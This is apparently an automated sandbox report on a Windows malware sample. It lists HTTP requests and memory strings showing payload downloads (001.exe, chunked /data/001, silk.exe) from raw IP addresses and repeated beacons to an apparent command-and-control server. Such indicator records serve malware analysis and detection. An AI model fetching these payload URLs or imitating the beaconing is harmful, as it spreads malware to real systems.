            Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac02908ee11d51a29366be8e843a8ec4cda8eec906920dff156d3c9b841d6d28155b2b7fdc10c06d180594f893e250f8a74d8d9d3935949ca7633f1d806 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 176.113.115.96
            Source: global trafficHTTP traffic detected: GET /001.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 104.168.28.10Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-983039User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=983040-1114111User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1245183User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1245184-1376255User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1376256-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-2097151User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2097152-2359295User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2359296-2621439User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2621440-2883583User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=2883584-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4325375User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4325376-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5636095User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=5636096-6160383User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6160384-6684671User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: global trafficHTTP traffic detected: GET /data/001 HTTP/1.1Host: 104.168.28.10Range: bytes=6684672-6763823User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2911.0 Safari/537.36Accept: */*
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmp, 12321321.exe, 00000000.00000002.1416136932.00000000000AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001.exe
            Source: 12321321.exe, 00000000.00000002.1416136932.00000000000AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/001.exei
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/0011
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001:
            Source: vbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001D
            Source: vbc.exe, 00000002.00000002.1417572787.000001C6128E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001GPROFILE
            Source: vbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001M
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001_
            Source: vbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001o
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001w
            Source: vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001w(
            Source: vbc.exe, 00000002.00000002.1418587097.000001C612C90000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.1418695436.000001C612CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/data/001wu
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2564407826.0000000005D73000.00000004.00001000.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000000.1440851005.0000000000889000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
            Source: powershell.exe, 00000003.00000002.1638334995.000001F9F88D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsZ
            Source: Hmas5kDc_8664.sys.2.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2564407826.0000000005D73000.00000004.00001000.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000000.1440851005.0000000000889000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2564407826.0000000005D73000.00000004.00001000.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000000.1440851005.0000000000889000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
            Source: Hmas5kDc_8664.sys.2.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
            Source: is-MLBF0.tmp.8.drString found in binary or memory: http://icu-project.org
            Source: is-37486.tmp.8.drString found in binary or memory: http://nanoways.com/check/%hs
            Source: powershell.exe, 00000003.00000002.1625894793.000001F9F05EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2564407826.0000000005D73000.00000004.00001000.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000000.1440851005.0000000000889000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://ocsp.digicert.com0H
            Source: Hmas5kDc_8664.sys.2.drString found in binary or memory: http://ocsp.thawte.com0
            Source: powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1486915723.000001F9E0798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000003.00000002.1486915723.000001F9E0571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1486915723.000001F9E0798000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000005.00000002.1578566714.000001F9312DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
            Source: powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2562884264.0000000000401000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.innosetup.com/
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000000.1415794332.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, silk[1].exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000000.1415794332.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, silk[1].exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: powershell.exe, 00000003.00000002.1638480284.000001F9F89D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
            Source: 12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417508392.0000000002098000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417203223.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2562884264.0000000000401000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.remobjects.com/ps
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417508392.0000000002098000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1417203223.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2562884264.0000000000401000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.remobjects.com/psU
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/C
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/F
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/M32
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/T
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb386926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003599000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb387926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38a926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38d926d19fe6595cd66946951e91fcd85200
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f802a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f812a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.00000000035A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f822a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f832a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f842a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000002.2564708817.00000000035A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.000000000359D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac0290
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/allowedCert_OS_1
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/en-GB
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/f
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/priseCertificates
            Source: photorecoverylib.exe, 0000000A.00000002.2563243952.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/r
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/rosoft
            Source: photorecoverylib.exe, 0000000A.00000002.2564708817.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://176.113.115.96/y
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/
            Source: 12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exe
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exe?
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeC:
            Source: 12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeLMEMP
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeRRC:
